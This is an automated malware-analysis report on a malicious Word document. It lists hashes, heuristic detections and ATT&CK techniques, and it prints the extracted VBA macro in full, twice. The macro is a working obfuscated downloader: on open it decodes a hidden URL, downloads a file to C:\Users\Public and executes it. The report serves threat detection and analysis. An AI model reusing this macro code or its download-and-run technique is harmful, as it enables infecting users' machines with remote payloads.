Office (OLE) malware analysis — malicious · fbc9b2367b6d476a

MALICIOUS

Office (OLE)

130.0 KB Created: 2018-05-15 23:15:00 Authoring application: Microsoft Office Word First seen: 2018-06-30

MD5: ee4b8615db52f00aac4ad96536b6533d SHA-1: c9b9041e998300ba63d38c1dc97b7687cd6cbc37 SHA-256: fbc9b2367b6d476a65be05ebd2070f4ac3bed6c329ac0c0e0d2ccecafff5a0b4

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening a document. The macro utilizes CreateObject to insert a picture from the URL "http://doitrightnow.xyz/text.png", indicating a likely attempt to lure the user into interacting with malicious content. The ClamAV heuristic also flags the file as a malicious macro document.

Heuristics 7

ClamAV: Doc.Macro.ObfuscatedHeuristic-5931994-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.ObfuscatedHeuristic-5931994-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://doitrightnow.xyz/text.png In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3360 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3360 bytes
SHA-256: `c072de994130d7d150632b265233b91d85830b65a29c51aea3b66ea88c003e61`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "UGoo2g" Public Function MSFoFV5xdyTzaSG(ByRef xvdP68uzIquMVL As String, ByRef THREE As String) As String Dim ZQ8K8ppATde68VI() As Byte Dim ehMXbUxu1iw1LVx4AN() As Byte Dim SP3WBQvMcREubJ As Long Dim OwBflZe9oiGlMye As Long Dim iZjetmGONl8mO1iq As Long Dim GHnkPUTSltWlU As Long ZQ8K8ppATde68VI = StrConv(xvdP68uzIquMVL, vbFromUnicode) ehMXbUxu1iw1LVx4AN = StrConv(THREE, vbFromUnicode) SP3WBQvMcREubJ = UBound(ZQ8K8ppATde68VI) OwBflZe9oiGlMye = UBound(ehMXbUxu1iw1LVx4AN) For iZjetmGONl8mO1iq = 0 To SP3WBQvMcREubJ ZQ8K8ppATde68VI(iZjetmGONl8mO1iq) = ZQ8K8ppATde68VI(iZjetmGONl8mO1iq) Xor ehMXbUxu1iw1LVx4AN(GHnkPUTSltWlU) If GHnkPUTSltWlU < OwBflZe9oiGlMye Then GHnkPUTSltWlU = GHnkPUTSltWlU + 1 Else GHnkPUTSltWlU = 0 End If Next iZjetmGONl8mO1iq MSFoFV5xdyTzaSG = StrConv(ZQ8K8ppATde68VI, vbUnicode) End Function Sub RemovePicture() Dim ambJOpJAMlpHzTH As InlineShape For Each ambJOpJAMlpHzTH In ActiveDocument.InlineShapes ambJOpJAMlpHzTH.Delete Next ambJOpJAMlpHzTH End Sub Function InsertURLGraphic(URL As String) With Dialogs(wdDialogInsertPicture) .Name = URL .Execute End With End Function Public Function QF7llEWFwFYszNu(dvYus8Pa6C1zz9g As String) As Object Set QF7llEWFwFYszNu = CreateObject(dvYus8Pa6C1zz9g) End Function Sub AutoOpen() Dim NVD6szzeQrhKrz As String NVD6szzeQrhKrz = k8hZ8j.cckEg3g Dim uhzPIG29eiOPUKQ2AQf47 As String RemovePicture InsertURLGraphic ("http://doitrightnow.xyz/text.png") uhzPIG29eiOPUKQ2AQf47 = MSFoFV5xdyTzaSG(NVD6szzeQrhKrz, ActiveDocument.CustomDocumentProperties("YcciikpTY8C9dUF").Value) k8hZ8j.mHtFUqIFdyrytlEgCA (uhzPIG29eiOPUKQ2AQf47) End Sub Attribute VB_Name = "k8hZ8j" Attribute VB_Base = "0{895AB22C-413E-493D-9510-3D00B8AC5D9B}{A715EA50-9524-419B-8F92-B70CE426B1D2}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function mHtFUqIFdyrytlEgCA(ByVal XqQY7DkH7dryvvp As String) Dim THIRTYMSFoFV5xdyTzaSG As Object, lwjuHKvI0B4wo3mSK As Long, MiRKbUKpfNsoXpC5() As Byte xAJaZVXQJOSw3Pn = "C:\Users\Public\wFTBStkX." & Chr(Tan(CDbl(1.56089566020691))) & Chr(Tan(CDbl(1.56246318635476))) & Chr(Tan(CDbl(1.56089566020691))) Set THIRTYMSFoFV5xdyTzaSG = QF7llEWFwFYszNu("MSXML2.ServerXMLHTTP.6.0") THIRTYMSFoFV5xdyTzaSG.Open "GET", XqQY7DkH7dryvvp, False THIRTYMSFoFV5xdyTzaSG.Send Do While THIRTYMSFoFV5xdyTzaSG.readyState <> 4 DoEvents Loop MiRKbUKpfNsoXpC5 = THIRTYMSFoFV5xdyTzaSG.responseBody lwjuHKvI0B4wo3mSK = FreeFile If Dir(xAJaZVXQJOSw3Pn) <> "" Then Kill xAJaZVXQJOSw3Pn Open xAJaZVXQJOSw3Pn For Binary As #lwjuHKvI0B4wo3mSK Put #lwjuHKvI0B4wo3mSK, , MiRKbUKpfNsoXpC5 Close #lwjuHKvI0B4wo3mSK Set THIRTYMSFoFV5xdyTzaSG = Nothing Dim Ue0G6fnuD2sR3oE: Set Ue0G6fnuD2sR3oE = QF7llEWFwFYszNu(MSFoFV5xdyTzaSG(k8hZ8j.cckEg3g.Tag, ActiveDocument.CustomDocumentProperties("YcciikpTY8C9dUF").Value)) Ue0G6fnuD2sR3oE.Run xAJaZVXQJOSw3Pn, 0, True End Function

SHA-256: c072de994130d7d150632b265233b91d85830b65a29c51aea3b66ea88c003e61

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "UGoo2g"

Public Function MSFoFV5xdyTzaSG(ByRef xvdP68uzIquMVL As String, ByRef THREE As String) As String
Dim ZQ8K8ppATde68VI() As Byte
Dim ehMXbUxu1iw1LVx4AN() As Byte
Dim SP3WBQvMcREubJ As Long
Dim OwBflZe9oiGlMye As Long
Dim iZjetmGONl8mO1iq As Long
Dim GHnkPUTSltWlU As Long
ZQ8K8ppATde68VI = StrConv(xvdP68uzIquMVL, vbFromUnicode)
ehMXbUxu1iw1LVx4AN = StrConv(THREE, vbFromUnicode)
SP3WBQvMcREubJ = UBound(ZQ8K8ppATde68VI)
OwBflZe9oiGlMye = UBound(ehMXbUxu1iw1LVx4AN)
For iZjetmGONl8mO1iq = 0 To SP3WBQvMcREubJ
ZQ8K8ppATde68VI(iZjetmGONl8mO1iq) = ZQ8K8ppATde68VI(iZjetmGONl8mO1iq) Xor ehMXbUxu1iw1LVx4AN(GHnkPUTSltWlU)
If GHnkPUTSltWlU < OwBflZe9oiGlMye Then
GHnkPUTSltWlU = GHnkPUTSltWlU + 1
Else
GHnkPUTSltWlU = 0
End If
Next iZjetmGONl8mO1iq
MSFoFV5xdyTzaSG = StrConv(ZQ8K8ppATde68VI, vbUnicode)
End Function

Sub RemovePicture()
Dim ambJOpJAMlpHzTH As InlineShape
For Each ambJOpJAMlpHzTH In ActiveDocument.InlineShapes
ambJOpJAMlpHzTH.Delete
Next ambJOpJAMlpHzTH
End Sub
Function InsertURLGraphic(URL As String)
With Dialogs(wdDialogInsertPicture)
.Name = URL
.Execute
End With
End Function

Public Function QF7llEWFwFYszNu(dvYus8Pa6C1zz9g As String) As Object
Set QF7llEWFwFYszNu = CreateObject(dvYus8Pa6C1zz9g)
End Function

Sub AutoOpen()
Dim NVD6szzeQrhKrz  As String
NVD6szzeQrhKrz = k8hZ8j.cckEg3g
Dim uhzPIG29eiOPUKQ2AQf47 As String
RemovePicture
InsertURLGraphic ("http://doitrightnow.xyz/text.png")

uhzPIG29eiOPUKQ2AQf47 = MSFoFV5xdyTzaSG(NVD6szzeQrhKrz, ActiveDocument.CustomDocumentProperties("YcciikpTY8C9dUF").Value)
k8hZ8j.mHtFUqIFdyrytlEgCA (uhzPIG29eiOPUKQ2AQf47)
End Sub


Attribute VB_Name = "k8hZ8j"
Attribute VB_Base = "0{895AB22C-413E-493D-9510-3D00B8AC5D9B}{A715EA50-9524-419B-8F92-B70CE426B1D2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Function mHtFUqIFdyrytlEgCA(ByVal XqQY7DkH7dryvvp As String)
Dim THIRTYMSFoFV5xdyTzaSG As Object, lwjuHKvI0B4wo3mSK As Long, MiRKbUKpfNsoXpC5() As Byte
xAJaZVXQJOSw3Pn = "C:\Users\Public\wFTBStkX." & Chr(Tan(CDbl(1.56089566020691))) & Chr(Tan(CDbl(1.56246318635476))) & Chr(Tan(CDbl(1.56089566020691)))
Set THIRTYMSFoFV5xdyTzaSG = QF7llEWFwFYszNu("MSXML2.ServerXMLHTTP.6.0")
THIRTYMSFoFV5xdyTzaSG.Open "GET", XqQY7DkH7dryvvp, False
THIRTYMSFoFV5xdyTzaSG.Send
Do While THIRTYMSFoFV5xdyTzaSG.readyState <> 4
DoEvents
Loop
MiRKbUKpfNsoXpC5 = THIRTYMSFoFV5xdyTzaSG.responseBody
lwjuHKvI0B4wo3mSK = FreeFile
If Dir(xAJaZVXQJOSw3Pn) <> "" Then Kill xAJaZVXQJOSw3Pn
Open xAJaZVXQJOSw3Pn For Binary As #lwjuHKvI0B4wo3mSK
Put #lwjuHKvI0B4wo3mSK, , MiRKbUKpfNsoXpC5
Close #lwjuHKvI0B4wo3mSK
Set THIRTYMSFoFV5xdyTzaSG = Nothing
Dim Ue0G6fnuD2sR3oE: Set Ue0G6fnuD2sR3oE = QF7llEWFwFYszNu(MSFoFV5xdyTzaSG(k8hZ8j.cckEg3g.Tag, ActiveDocument.CustomDocumentProperties("YcciikpTY8C9dUF").Value))
Ue0G6fnuD2sR3oE.Run xAJaZVXQJOSw3Pn, 0, True
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.